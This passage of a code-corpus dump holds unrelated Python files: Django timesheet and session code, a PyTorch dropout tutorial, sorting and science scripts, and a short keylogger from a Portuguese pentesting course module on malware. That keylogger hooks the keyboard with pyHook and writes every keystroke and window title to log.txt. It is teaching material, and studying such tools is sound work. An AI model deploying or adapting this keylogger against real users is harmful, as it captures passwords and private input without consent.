[smart_str(context['tabel_date'])])\n writer.writerow(10*[' '] + [smart_str(context['dept_name'])])\n if 'proj_name' in context:\n writer.writerow(10*[' '] + [smart_str(u'б.т. ') + smart_str(context['proj_name'])])\n writer.writerow([])\n writer.writerow([\n smart_str(u'ФІО'),\n smart_str(u'Посада')] +\n context['day_num_lst'] +\n [smart_str(u'Всього'),\n smart_str(u'Годин'),\n smart_str(u'Вихідних'),\n smart_str(u'В'),\n smart_str(u'Н'),\n smart_str(u'НА'),\n smart_str(u'Д'),\n smart_str(u'ДО'),\n smart_str(u'Ч'),\n smart_str(u'ВП'),\n smart_str(u'ДД'),\n smart_str(u'ТН'),\n smart_str(u'НН'),\n smart_str(u'ПР'),\n smart_str(u'ІН'),\n smart_str(u'ВД'),\n smart_str(u'ВБ'),\n ]\n )\n for r in context['tabel_lst']:\n writer.writerow([smart_str(r['fio']), smart_str(r['appoint_name'])] +\n [smart_str(d) for d in r['days_lst']] +\n [\n self.get_ttl_val(r['totals_dic'], 'WORK', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'WORK', 'hours_cnt'),\n self.get_ttl_val(r['totals_dic'], 'WEEKEND', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'V', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'N', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'NA', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'D', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'DO', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'CH', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'VP', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'DD', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'TN', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'NN', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'PR', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'IN', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'VD', 'days_cnt'),\n self.get_ttl_val(r['totals_dic'], 'VB', 'days_cnt'),\n ]\n )\n\n writer.writerow([])\n writer.writerow([smart_str(u'Відпустка чергова В')])\n writer.writerow([smart_str(u'Відпустка учбова Н')])\n writer.writerow([smart_str(u'Відпустка без оплати НА')])\n writer.writerow([smart_str(u'Відпустка додаткова Д')])\n writer.writerow([smart_str(u'Відпустка додаткова працівникам, які мають дітей ДО')])\n writer.writerow([smart_str(u'Відпустка чорнобильська Ч')])\n writer.writerow([smart_str(u'Відпустка по догляду за дитиною до 3 років ВП')])\n writer.writerow([smart_str(u'Відпустка по догляду за дитиною більше 6 років ДД')])\n writer.writerow([smart_str(u'Тимчасова непрацездатність ТН')])\n writer.writerow([smart_str(u'Неоплачена тимчасова непрацездатність НН')])\n writer.writerow([smart_str(u'Прогули ПР')])\n writer.writerow([smart_str(u'Відгули ІН')])\n writer.writerow([smart_str(u'Відрядження ВД')])\n writer.writerow([smart_str(u'Відрядження без оплати ВБ')])\n\n\n return response\n\n def get_ttl_val(self, totals_dic, ttl_name, cnt_name):\n if ttl_name in totals_dic:\n return totals_dic[ttl_name][cnt_name]\n else:\n return ''\n\n def get_queryset(self):\n if int(self.kwargs['is_first_half_of_month']) == 0:\n days_cnt = self.month_days_cnt(int(self.kwargs['year_num']), int(self.kwargs['month_num']))\n else:\n days_cnt = 15\n tabel = build_tabel_as_tbl(dept_code=int(self.kwargs['dept_code']),\n proj_code=int(self.kwargs['proj_code']),\n year_num=int(self.kwargs['year_num']),\n month_num=int(self.kwargs['month_num']),\n is_staffer=int(self.kwargs['is_staffer']),\n days_cnt=days_cnt,\n user_id=int(self.kwargs['user_code'])\n )\n return tabel\n\n def month_days_cnt(self, year_num, month_num):\n return monthrange(year_num, month_num)[1]\n\n def get_context_data(self, **kwargs):\n\n # dept_code, proj_code, year_num, month_num, is_staffer, is_first_half_of_month\n dept_name = Department.objects.get(pk=self.kwargs['dept_code']).dept_name\n proj_id = int(self.kwargs['proj_code'])\n if proj_id != 0:\n proj_name = Project.objects.get(pk=proj_id)\n else:\n proj_name=None\n\n tabel_date_str = self.calc_date(self.kwargs['year_num'], int(self.kwargs['month_num']), int(self.kwargs['is_first_half_of_month']))\n if int(self.kwargs['is_first_half_of_month'])==0:\n days_cnt = self.month_days_cnt(int(self.kwargs['year_num']), int(self.kwargs['month_num']))\n else:\n days_cnt = 15\n\n\n tabel_parms = {'dept_name': dept_name,\n 'proj_name': proj_name,\n 'tabel_date': tabel_date_str,\n 'is_first_half_of_month': int(self.kwargs['is_first_half_of_month']),\n 'is_staffer': int(self.kwargs['is_staffer']),\n 'day_num_lst': range(1, days_cnt+1),\n 'totals_lst': []\n }\n\n context = super(TabelListView, self).get_context_data(**tabel_parms)\n\n return context\n\n # def get_totals(self):\n # pass\n\n def calc_date(self, year_num, month_num, is_first_half_of_month):\n months = [u'січень', u'лютый', u'березень',\n u'квітень', u'травень', u'червень',\n u'липень', u'серпень', u'вересень',\n u'жовтень', u'листопад', u'грудень'\n ]\n\n months2 = [u'січня', u'лютого', u'березня',\n u'квітня', u'травня', u'червня',\n u'липня', u'серпня', u'вересня',\n u'жовтня', u'листопада', u'грудня'\n ]\n\n\n if is_first_half_of_month == 0:\n val = u'за %s %s року' % (months[month_num - 1], year_num)\n else:\n val = u'за першу половину %s %s року' % (months2[month_num - 1], year_num)\n\n return val\n\n\nclass WorktimeListView(TabelListView):\n template_name = 'worktime.html'\n context_object_name = 'worktime_lst'\n\n def get_queryset(self):\n if int(self.kwargs['is_first_half_of_month']) == 0:\n days_cnt = self.month_days_cnt(int(self.kwargs['year_num']), int(self.kwargs['month_num']))\n else:\n days_cnt = 15\n actual_worktime = build_actual_time_tabel_as_tbl(dept_code=int(self.kwargs['dept_code']),\n proj_code=int(self.kwargs['proj_code']),\n year_num=int(self.kwargs['year_num']),\n month_num=int(self.kwargs['month_num']),\n is_staffer=int(self.kwargs['is_staffer']),\n days_cnt=days_cnt,\n user_id=int(self.kwargs['user_code'])\n )\n return actual_worktime\n\n\ndef login_user(request):\n \"\"\"\n Displays the login form for the given HttpRequest.\n \"\"\"\n\n context = {\n 'app_path': '/',\n 'next': '/home',\n }\n # context.update(extra_context or {})\n\n defaults = {\n 'extra_context': context,\n 'current_app': 'timeboard',\n 'authentication_form': AuthenticationForm,\n 'template_name': 'registration/timeboard_login.html',\n }\n return login(request, **defaults)\n\n\ndef logout_user(request):\n logout(request)\n return HttpResponseRedirect(\"/login\")\n\n\ndef read_user_month_timeboard(user_id, year_num, month_num):\n user = User.objects.get(pk=user_id)\n month_timeboard = {'user_name': '%s %s' % (user.last_name, user.first_name),\n 'year_num': year_num,\n 'month_num': month_num,\n 'month_works': None\n \n }\n\n return month_timeboard\n\n\ndef get_month_all_activity(user_id, year_num, month_num):\n pass\n\n\ndef read_user_timeboard(user_id, date_of_work):\n \"\"\"\n\n :param user_id:\n :param work_date:\n :return:\n \"\"\"\n user = User.objects.get(pk=user_id)\n timeboard = {'user_name': '%s %s' % (user.last_name, user.first_name),\n 'not_closed_works': job_activity(not_closed_works_qs(user_id, date_of_work)),\n # 'all_day_lst': job_activity(all_jobs_all_day_activity_qs(user_id, date_of_work)),\n 'one_day_lst': one_day_activity_lst(user_id, date_of_work)\n }\n\n return timeboard\n\n\ndef not_closed_works_qs(user_id, date_of_work):\n return WorkTime.objects.filter(Q(to_date=None) | Q(to_time=None),\n Q(list_of_staff__user=user_id), reason__all_day=False,\n from_date__lt=date_of_work)\n\n\ndef one_day_activity_lst(user_id, date_of_work):\n los = user_los_qs(user_id)\n acivity_lst = []\n for job in los:\n activity = {}\n activity['department'] = job.department.dept_name\n activity['position'] = job.appointment.appoint_name\n activity['id'] = job.pk\n activity['job_all_day_lst'] = job_activity(one_job_all_day_activity_qs(job, date_of_work))\n activity['work_schedule'] = job_schedule(job, date_of_work)\n activity['hourly_job_lst'] = job_activity(one_job_hourly_activity_qs(job, date_of_work))\n\n acivity_lst.append(activity)\n\n return acivity_lst\n\n\ndef user_los_qs(user_id):\n return ListOfStaff.objects.select_related('department', 'appointment').filter(user=user_id).order_by('staffer')\n\n\ndef one_job_all_day_activity_qs(job_obj, date_of_work):\n qs = job_obj.worktime_set.filter(Q(to_date__gte=date_of_work) | Q(to_date=None),\n from_date__lte=date_of_work,\n reason__all_day=True)\n\n return qs\n\n\ndef job_activity(qs):\n if qs.count() == 0:\n return None\n else:\n activity_lst = [{'id': work.pk,\n 'from_date': work.from_date,\n 'from_time': work.from_time,\n 'to_date': work.to_date,\n 'to_time': work.to_time,\n 'reason': work.reason.reason_name\n }\n for work in qs\n ]\n return activity_lst\n\n\ndef one_job_hourly_activity_qs(job_obj, date_of_work):\n return job_obj.worktime_set.filter(from_date=date_of_work, reason__all_day=False)\n\n\ndef job_schedule(job_obj, date_of_work):\n try:\n schedule = job_obj.operatingscheduleweekly\n if date_of_work.weekday() <= 4:\n # mon..fri\n dayofweek = ['mon', 'tue', 'wed', 'thu', 'fri'][date_of_work.weekday()]\n dayofweek_title = [u'Понеділок', u'Вівторок', u'Середа', u'Четвер', u'П\\'ятниця'][date_of_work.weekday()]\n start_work = getattr(schedule, '%s_start' % dayofweek)\n end_work = getattr(schedule, '%s_end' % dayofweek)\n start_dinner = getattr(schedule, '%s_dinner' % dayofweek)\n if start_dinner is not None:\n end_dinner = (datetime.combine(date.today(), start_dinner) + timedelta(hours=1)).time()\n else:\n end_dinner = None\n work_schedule = {'dayofweek_title': dayofweek_title,\n 'start_work': start_work,\n 'end_work': end_work,\n 'start_dinner': start_dinner,\n 'end_dinner': end_dinner\n }\n else:\n work_schedule = None\n except OperatingScheduleWeekly.DoesNotExist as e:\n work_schedule = None\n\n return work_schedule\n","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"86168992","text":"#\r\n# Python para Pentesters\t\t\t \r\n# Desenvolvendo um Keylogger\r\n#\r\n\r\nimport pyHook\r\nimport pythoncom\r\n\r\njanela = None\r\n\r\ndef tecla_pressionada(evento):\r\n\tarquivo = open('log.txt', 'w+') # Salvar os logs\r\n\tglobal janela\r\n\tif evento.WindowName != janela:\r\n\t\tjanela = evento.WindowName\r\n\t\tarquivo.write('\\n' + janela + ' - ' + str(evento.Time) + '\\n')\r\n\tarquivo.write(chr(evento.Ascii))\r\n\tarquivo.close() # Fechando arquivo\r\n\r\n# Criando um gancho:\r\nhook = pyHook.HookManager()\r\nhook.Keydown = tecla_pressionada \t\t# Sempre que alguém pressionar uma tecla a função evento é chamada\r\nhook.HookKeyboard() \t\t\t\t# Captura o que foi digitado\r\npythoncom.PumpMessages() \t\t\t# Cria um looping infinito dos eventos realizados no SO\r\n\r\n","sub_path":"Anotações/Módulo 7 - Malwares/2. Desenvolvendo um Keylogger.py","file_name":"2. Desenvolvendo um Keylogger.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"56439602","text":"import math\r\nimport IceRayCpp\r\n\r\ndef name( ):\r\n return \"box\"\r\n\r\ndef make(\r\n #P_len = (math.sqrt(5)-1)/2 \r\n P_len = 1\r\n ): # P_lo, P_hi\r\n lo = IceRayCpp.MathTypeCoord3D()\r\n lo[0] = -P_len\r\n lo[1] = -P_len\r\n lo[2] = -P_len\r\n\r\n hi = IceRayCpp.MathTypeCoord3D()\r\n hi[0] = P_len\r\n hi[1] = P_len\r\n hi[2] = P_len\r\n\r\n box3 = IceRayCpp.GeometrySimpleBox( lo, hi )\r\n\r\n return { 'this': box3 }\r\n","sub_path":"example/test/core/geometry/simple/box/unit.py","file_name":"unit.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"650571662","text":"import os\nFs = os.listdir('.')\nD = {}\nfor F in Fs:\n if F[-4:] == '-pep':\n inFile = open(F)\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n spec = fields[0].split()[0]\n pep = fields[1]\n D.setdefault(pep, [])\n D[pep].append(spec)\n inFile.close()\n\nouFile = open('Peptides-pFind', 'w')\nfor k in D:\n ouFile.write(k + '\\t' + '\\t'.join(D[k]) + '\\n')\nouFile.close()\n","sub_path":"NonSynonymous-SNV-Hetrozygous/pFind-First/peptdes-pfind.py","file_name":"peptdes-pfind.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"294995674","text":"from django.urls import include, path\n\nfrom . import views\n\nurlpatterns = [\n # pomocnicze\n path('def/', views.leftSideDef, name=\"def\"),\n path('', views.welPage, name=\"main\"),\n # posty\n path('putPost/', views.putPost, name='putPost'),\n path('postCreate/', views.postCreate, name=\"postCreate\"),\n path('post/', views.putPost, name=\"post\"),\n path('postDelete/', views.postDelete, name=\"postDelete\"),\n # grupy i itemy\n path('itemGroups/', views.groupOfItmesView, name=\"groups\"),\n path('groups//', views.detailOfGroup, name=\"detail\"),\n path('addGroup/', views.addGroup, name=\"groupCreate\"),\n path('itemGroups/groupDelete/', views.groupDelete, name=\"groupDelete\"),\n path('addItem/', views.addItem, name=\"addItem\"),\n path('deleteItem///', views.deleteItem, name=\"deleteItem\"),\n path('plusItem///', views.addOneUnit, name=\"plusItem\"),\n path('minusItem///', views.minusOneUnit, name=\"minusItem\"),\n # grafiki\n path('schedule/', views.putSchedule, name=\"schedule\"),\n path('addFlatMateQ/', views.faltMateListCreate, name=\"cerateFlatMateQ\"),\n path('addSchedule/', views.scheduleCreate, name=\"cerateSchedule\"),\n path('scheduleDelete/', views.scheduleDelete, name=\"scheduleDelete\"),\n path('addFlatMates/', views.addFlateMates, name=\"addMate\"),\n\n]\n","sub_path":"userPanel/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"132004847","text":"# -*- encoding: utf-8 -*-\n\nimport torch\nimport numpy as np\nimport sys\nsys.path.append('../..')\nimport dl_common_pytorch as dl\nimport torch.nn as nn\n\n'''\n除了权重衰减可以处理过拟合问题,在深度学习模型还经常使用丢弃法(dropout)应对过拟合问题。\n丢弃法有一些不同的变体,下面以倒置丢弃法(inverted dropout)为例。\n\n多层感知机:含有一个单隐藏层的多层感知机,其中数人个数为4,隐藏单元个数为5,且隐藏单元hi(i=1~5)的计算表达式:\nhi = Q(x1w1i + x2w2i + x3w3i + x4w4i + bi)\n其中Q为激活函数,x1x2x3x4是输入,隐藏单元i的权重参数为w1i,w2i,w3i,w4i(第i个隐藏单元权重参数,一个有5个隐藏单元),偏差参数为bi。\n当对该隐藏层使用丢弃法时,该层的隐藏单元将有一定概率被丢弃掉。设丢弃概率wiep,那么有p的概率hi会被清零,有1-p的概率hi会除以1-p做拉伸。\n丢弃概率是丢弃法的超参数。具体来说,设随机变量ei为0和1的概率分别为p和1-p,使用丢弃法时我们计算新的隐藏单元h'i:\nh'i = (ei / (1-p)) * hi\n由于E(ei) = 1 - p,因此:\nE(h'i) = (E(ei) / (1-p)) * hi = hi,即丢弃法不改变其输入的期望值\n'''\ndef dropout(X, drop_prob):\n X = X.float()\n assert 0 <= drop_prob <= 1\n keep_prob = 1 - drop_prob\n # 这种情况下把全部元素都抛弃\n if keep_prob == 0:\n return torch.zeros_like(X)\n # 随机一个与X一致矩阵,对比里面的每个元素是否小于keep_prob,然后将符合条件的使用.float()转换为1\n mask = (torch.randn(X.shape) < keep_prob).float()\n # 将mask与X相乘,就会去掉一些隐藏的单元,剩下的元素再除以keep_prob\n return mask * X / keep_prob\n\n# 丢弃概率分别为0、0.5和1\nX = torch.arange(16).view(2, 8)\nprint(dropout(X, 0))\nprint(dropout(X, 0.5))\nprint(dropout(X, 1.0))\n\n# 定义一个包含两个隐藏层的多层感知机,其中两个隐藏层的输出个数都是256\nnum_inputs, num_outputs, num_hiddens1, num_hiddens2 = 784, 10, 256, 256\n\nW1 = torch.tensor(np.random.normal(0, 0.01, size=(num_inputs, num_hiddens1)), dtype=torch.float, requires_grad=True)\nb1 = torch.zeros(num_hiddens1, requires_grad=True)\nW2 = torch.tensor(np.random.normal(0, 0.01, size=(num_hiddens1, num_hiddens2)), dtype=torch.float, requires_grad=True)\nb2 = torch.zeros(num_hiddens2, requires_grad=True)\nW3 = torch.tensor(np.random.normal(0, 0.01, size=(num_hiddens2, num_outputs)), dtype=torch.float, requires_grad=True)\nb3 = torch.zeros(num_outputs, requires_grad=True)\nparams = [W1, b1, W2, b2, W3, b3]\n\n# 定义模型将全连接层和激活函数ReLU串起来,并对每个激活函数的输出使用丢弃法。\n# 可以分别设置各个层的丢弃概率。通常的建议是把靠近输入层的丢弃概率设置得小一点。\n# 在此实验中,我们将第一个隐藏层的丢弃概率设置为0.2,第二个隐藏层的丢弃概率设为0.5。\n# 通过参数is_training函数来判断运行模式为训练还是测试,并只需在训练模型下使用丢弃法。\ndrop_prob1, drop_prob2 = 0.2, 0.5\n\ndef net(X, is_training=True):\n X = X.view(-1, num_inputs)\n # 第一隐藏层函数其实就是将原函数通过激活relu函数输出到第二层隐藏层\n H1 = (torch.matmul(X, W1) + b1).relu()\n if is_training: # 只在训练模型时使用丢弃法\n H1 = dropout(H1, drop_prob1) # 在第一层全连接后添加丢弃层\n H2 = (torch.matmul(H1, W2) + b2).relu()\n if is_training: # 只在训练模型时使用丢弃法\n H1 = dropout(H2, drop_prob2) # 在第二层全连接后添加丢弃层\n return torch.matmul(H2, W3) + b3\n\n# 在模型评估时,不应该进行丢弃\nnum_epochs, lr, batch_size = 5, 100.0, 256\nloss = torch.nn.CrossEntropyLoss()\ntrain_iter, test_iter = dl.load_data_fashion_mnist(batch_size)\ndl.train_ch3(net, train_iter, test_iter, loss, num_epochs, batch_size, params, lr)\n'''\n��1次正在训练.\nepoch 1, loss 0.0047, train acc 0.534, test acc 0.724\n第2次正在训练.\nepoch 2, loss 0.0023, train acc 0.784, test acc 0.769\n第3次正在训练.\nepoch 3, loss 0.0019, train acc 0.825, test acc 0.829\n第4次正在训练.\nepoch 4, loss 0.0017, train acc 0.840, test acc 0.825\n第5次正在训练.\nepoch 5, loss 0.0016, train acc 0.849, test acc 0.833\n'''\n\n# PyTorch的简洁实现,只需要在全连接层后添加Dropout层并指定丢弃概率\n# 在训练模型时,Dropout层将以指定的丢弃概率随机丢弃上一层的输出元素;在测试模型时(即model.eval()后),Dropout层并不发挥作用。\nnet = nn.Sequential(\n dl.FlattenLayer(),\n nn.Linear(num_inputs, num_hiddens1),\n nn.ReLU(),\n nn.Dropout(drop_prob1),\n nn.Linear(num_hiddens1, num_hiddens2),\n nn.ReLU(),\n nn.Dropout(drop_prob2),\n nn.Linear(num_hiddens2, num_outputs)\n)\n\nfor param in net.parameters():\n nn.init.normal_(param, mean=0, std=0.01)\n \n# 训练并测试模型\noptimizer = torch.optim.SGD(net.parameters(), lr=0.5)\ndl.train_ch3(net, train_iter, test_iter, loss, num_epochs, batch_size, None, None, optimizer)\n'''\n第1次正在训练.\nepoch 1, loss 0.0044, train acc 0.557, test acc 0.763\n第2次正在训练.\nepoch 2, loss 0.0022, train acc 0.787, test acc 0.819\n第3次正在训练.\nepoch 3, loss 0.0019, train acc 0.820, test acc 0.743\n第4次正在训练.\nepoch 4, loss 0.0018, train acc 0.837, test acc 0.834\n第5次正在训练.\nepoch 5, loss 0.0016, train acc 0.848, test acc 0.828\n'''","sub_path":"04.动手深度学习-Pytorch/03.线性回归/codes/10.overfitting_dropout丢弃法处理过拟合问题 - 副本.py","file_name":"10.overfitting_dropout丢弃法处理过拟合问题 - 副本.py","file_ext":"py","file_size_in_byte":5522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"40084401","text":"\"\"\"\nSelection Sort\nGiven an array of integers, sort the elements in the array in ascending order. The selection sort algorithm should be used to solve this problem.\n\nExamples\n\n{1} is sorted to {1}\n{1, 2, 3} is sorted to {1, 2, 3}\n{3, 2, 1} is sorted to {1, 2, 3}\n{4, 2, -3, 6, 1} is sorted to {-3, 1, 2, 4, 6}\nCorner Cases\n\nWhat if the given array is null? In this case, we do not need to do anything.\nWhat if the given array is of length zero? In this case, we do not need to do anything.\n\"\"\"\n\nclass Solution(object):\n def solve(self, array):\n \"\"\"\n array: int[]\n return: int[]\n \"\"\"\n # write your solution here\n # check for None or 0-length case\n if not array:\n return [] # ===> should return [] instead of None\n # loop over 0 - (n - 1)\n for i in range(len(array)-1):\n # find the min value and its index for the remaining elements\n min_idx = i\n for j in range(i+1, len(array)):\n if array[j] < array[min_idx]:\n min_idx = j\n # swap\n array[i], array[min_idx] = array[min_idx], array[i]\n return array","sub_path":"lo/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"161925724","text":"from flask import Blueprint, url_for, abort\nfrom functools import wraps\nimport threading\nfrom collections import OrderedDict\nfrom flask.ext.login import current_user, login_required\n\n\nclass MenuBlueprint(Blueprint):\n def __init__(self, *args, **kwargs):\n super(MenuBlueprint, self).__init__(*args, **kwargs)\n self.full_menu = OrderedDict()\n self.tabs = OrderedDict()\n self.tlocal = threading.local()\n self.permissions = {}\n self.context_processor(self._menu_context_processor)\n\n def menu(self, tab, pill, link=True, icon=None):\n def outer_decorator(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n self.tlocal.active = tab\n self.tlocal.pill = pill\n rv = f(*args, **kwargs)\n self.tlocal.active = None\n self.tlocal.pill = None\n return rv\n if link:\n menu1 = self.full_menu.setdefault(tab, OrderedDict())\n if pill is not None:\n menu1[pill] = (f.__name__, icon if pill != 'index' else None)\n if pill == 'index' or pill is None:\n self.tabs[tab] = (f.__name__, icon)\n return decorated_function\n return outer_decorator\n\n def permission_required(self, *kinds):\n def outer_decorator(f):\n @login_required\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if not current_user.has_permissions(set(kinds)):\n abort(403)\n return f(*args, **kwargs)\n self.permissions[f.__name__] = set(kinds)\n return decorated_function\n return outer_decorator\n\n def _menu_context_processor(self):\n active = getattr(self.tlocal, 'active', None)\n if active is None:\n return {}\n\n return dict(\n active=active,\n active_pill=self.tlocal.pill,\n tabs=[(k, url_for(self.name+'.'+v[0]), v[1])\n for k, v in self.tabs.items()\n if current_user.has_permissions(self.permissions[v[0]])],\n pills=[(k, url_for(self.name+'.'+v[0]), v[1])\n for k, v in self.full_menu[active].items()\n if current_user.has_permissions(self.permissions[v[0]])])\n","sub_path":"surfmanage/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"557563151","text":"from django.contrib.sessions.backends.base import SessionBase, CreateError\nfrom django.core.exceptions import SuspiciousOperation\nfrom django.utils.encoding import force_unicode\n\nfrom sentieolib.mongoengine.document import Document\nfrom sentieolib.mongoengine import fields\nfrom sentieolib.mongoengine.queryset import OperationError\n\nfrom datetime import datetime\nimport json\nimport httpagentparser\n\n\nclass MongoSession(Document):\n session_key = fields.StringField(primary_key=True, max_length=40)\n session_data = fields.StringField()\n expire_date = fields.DateTimeField()\n user_id = fields.StringField()\n user_agent = fields.StringField()\n device_id = fields.StringField()\n \n meta = {'collection': 'django_session', 'allow_inheritance': False}\n\n def embed(self):\n user_id = self.user_id if self.user_id else ''\n device_id = self.device_id if self.device_id else ''\n user_agent = ''\n if self.user_agent:\n value = json.loads(self.user_agent).get('ua')\n if value:\n dict = httpagentparser.detect(value)\n try:\n browser = dict['browser']['name'] + ' ' +dict.get('browser',{}).get('version','')\n os = dict['os']['name']+' '+dict.get('os',{}).get('version','')\n user_agent = 'Browser : '+browser+', OS : '+os\n\n except :\n # return value\n user_agent = ''\n else:\n user_agent = ''\n else:\n user_agent = ''\n\n return {'session_key':self.session_key,\n 'user_id':user_id,\n 'device_id':device_id,\n 'user_agent':user_agent}\n\n\nclass SessionStore(SessionBase):\n \"\"\"A MongoEngine-based session store for Django.\n \"\"\"\n\n def load(self):\n try:\n s = MongoSession.objects(session_key=self.session_key,\n expire_date__gt=datetime.now())[0]\n return self.decode(force_unicode(s.session_data))\n except (IndexError, SuspiciousOperation):\n self.create()\n return {}\n\n def exists(self, session_key):\n return bool(MongoSession.objects(session_key=session_key).first())\n\n def create(self):\n while True:\n self.session_key = self._get_new_session_key()\n try:\n self.save(must_create=True)\n except CreateError:\n continue\n self.modified = True\n self._session_cache = {}\n return\n\n def save(self, must_create=False):\n s = MongoSession(session_key=self.session_key)\n data = self._get_session(no_load=must_create)\n s.session_data = self.encode(data)\n s.expire_date = self.get_expiry_date()\n s.user_id = data.get('_user_id','')\n s.device_id = data.get('_dev_id','')\n s.user_agent = data.get('_user_agent','')\n try:\n s.save(force_insert=must_create, safe=True)\n except OperationError:\n if must_create:\n raise CreateError\n raise\n\n def delete(self, session_key=None):\n if session_key is None:\n if self.session_key is None:\n return\n session_key = self.session_key\n MongoSession.objects(session_key=session_key).delete()\n\n def set_user_id(self,userid):\n try:\n s = MongoSession.objects(session_key=self.session_key,\n expire_date__gt=datetime.now())[0]\n\n s.user_id = userid\n\n s.save()\n return 'uid Success '+userid+' '+self.session_key+' '\n except (IndexError, SuspiciousOperation):\n import traceback\n return 'set_user_id \\n\\n'+traceback.format_exc()\n\n def get_user_id(self):\n try:\n s = MongoSession.objects(session_key=self.session_key,\n expire_date__gt=datetime.now())[0]\n\n return s.user_id\n except (IndexError, SuspiciousOperation):\n return ''\n\n def set_user_agent(self,useragent):\n try:\n s = MongoSession.objects(session_key=self.session_key,\n expire_date__gt=datetime.now())[0]\n\n if type(useragent) == type({}):\n useragent = json.dumps(useragent)\n s.user_agent = useragent\n\n s.save()\n return 'ua Success '+useragent\n except (IndexError, SuspiciousOperation):\n import traceback\n return 'set_user_agent \\n\\n'+traceback.format_exc()\n\n def get_user_agent(self):\n try:\n s = MongoSession.objects(session_key=self.session_key,\n expire_date__gt=datetime.now())[0]\n\n if s.user_agent:\n return json.loads(s.user_agent)\n else:\n return {}\n except (IndexError, SuspiciousOperation):\n return {}\n\n def set_device_id(self,deviceid):\n try:\n s = MongoSession.objects(session_key=self.session_key,\n expire_date__gt=datetime.now())[0]\n\n s.device_id = deviceid\n s.save()\n return 'di Success '+deviceid\n except (IndexError, SuspiciousOperation):\n import traceback\n return 'set_di \\n\\n'+traceback.format_exc()\n\n def get_device_id(self):\n try:\n s = MongoSession.objects(session_key=self.session_key,\n expire_date__gt=datetime.now())[0]\n\n return s.device\n except (IndexError, SuspiciousOperation):\n pass\n\n\n def get_session_id(self):\n return self.session_key\n # def __contains__(self, key):\n # return key in self._session\n #\n # def __getitem__(self, key):\n # return self._session[key]\n #\n # def __setitem__(self, key, value):\n # self._session[key] = value\n # self.modified = True\n #\n # def __delitem__(self, key):\n # del self._session[key]\n # self.modified = True\n\n\n\n\n\n\n\n\n","sub_path":"mysite/mongoengine/django/sessions.py","file_name":"sessions.py","file_ext":"py","file_size_in_byte":6160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"189654034","text":"'''\nNumber sorting program\nCreated Spring 2019\nLab03\n@author: Ethan Walters (emw45)\n'''\n\n\n# Get numbers from user input\nnum1 = int(input('Please enter number 1: '))\nnum2 = int(input('Please enter number 2: '))\nnum3 = int(input('Please enter number 3: '))\nnum4 = int(input('Please enter number 4: '))\n\n# Create the lists\nnum_list = []\nnum_list2 = []\n\n# Append the numbers to the first list\nnum_list.append(num1)\nnum_list.append(num2)\nnum_list.append(num3)\nnum_list.append(num4)\n\n# Add the min number from list1 into list2, then remove the min number from list1 so that min number is only in list2.\n# Repeat this process until all numbers are sorted in order.\nnum_list2.append(min(num_list))\nnum_list.remove(min(num_list))\nnum_list2.append(min(num_list))\nnum_list.remove(min(num_list))\nnum_list2.append(min(num_list))\nnum_list.remove(min(num_list))\nnum_list2.append(min(num_list))\nnum_list.remove(min(num_list))\n\n# Print the second number list to display results\nprint(num_list2)","sub_path":"lab03/sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"480903863","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport shift_spectra\nimport specmatch_io\n\ndef run_script(lib_restr, ref_path):\n for index, row in lib_restr.iterrows():\n spec_path = '/Users/samuel/Dropbox/SpecMatch-Emp/spectra/iodfitsdb/'+row['obs']+'.fits'\n out_path = '../lib/'+row['obs']+'_adj.fits'\n img_path = '../lib/Images/'+str(row['Teff'])+'_'+row['obs']+'.png'\n img_lags_path = '../lib/Images/'+str(row['Teff'])+'_'+row['obs']+'_lags.png'\n try:\n s, w, serr = shift_spectra.main(spec_path, 'hires', ref_path, out_path, \n diagnostic=True, diagnosticfile=img_lags_path)\n except Exception as e:\n print(e)\n continue\n\n plt.clf()\n plt.plot(w_nso, s_nso)\n plt.plot(w, s)\n plt.xlim(5480, 5490)\n plt.savefig(img_path)\n\nlib = pd.read_csv('../starswithspectra.csv',index_col=0)\nlib = lib.convert_objects(convert_numeric=True)\n\nnso_path = '/Users/samuel/Dropbox/SpecMatch-Emp/nso/nso_std.fits'\ns_nso, w_nso, serr_nso, h_nso = 